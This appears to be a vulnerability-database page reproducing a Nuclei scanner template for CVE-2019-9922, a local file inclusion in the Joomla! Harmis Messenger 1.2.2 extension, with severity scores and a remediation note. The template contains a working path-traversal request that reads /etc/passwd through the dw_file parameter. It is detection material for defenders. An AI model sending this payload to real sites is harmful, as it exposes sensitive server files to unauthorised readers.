Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-9922
HistoryJul 10, 2022 - 10:31 p.m.

Joomla! Harmis Messenger 1.2.2 - Local File Inclusion

2022-07-1022:31:44
ProjectDiscovery
github.com
1

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.01 Low

EPSS

Percentile

83.4%

Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files.

id: CVE-2019-9922

info:
  name: Joomla! Harmis Messenger 1.2.2 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Joomla! Harmis Messenger 1.2.2 is vulnerable to local file inclusion which could give an attacker read access to arbitrary files.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! application.
  remediation: |
    Update to the latest version of Harmis Messenger (1.2.3) or apply the patch provided by the vendor to fix the LFI vulnerability.
  reference:
    - https://github.com/azd-cert/CVE/blob/master/CVEs/CVE-2019-9922.md
    - https://extensions.joomla.org/extension/je-messenger/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-9922
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/azd-cert/CVE
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-9922
    cwe-id: CWE-22
    epss-score: 0.00972
    epss-percentile: 0.83335
    cpe: cpe:2.3:a:harmistechnology:je_messenger:1.2.2:*:*:*:*:joomla\!:*:*
  metadata:
    max-request: 1
    vendor: harmistechnology
    product: je_messenger
    framework: joomla\!
  tags: cve2019,cve,joomla,messenger,lfi,harmistechnology,joomla\!

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200
# digest: 490a00463044022075f5b1b3927e8f7aedebc28364088cba1ee336b21ad819a295e55d634da59e2802203b60c8b3df80319ca3c99fe15b89adf399eff4b6a2fda7c94890a3ac67b454c9:922c64590222798bb761d5b6d8e72950

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.01 Low

EPSS

Percentile

83.4%

Related for NUCLEI:CVE-2019-9922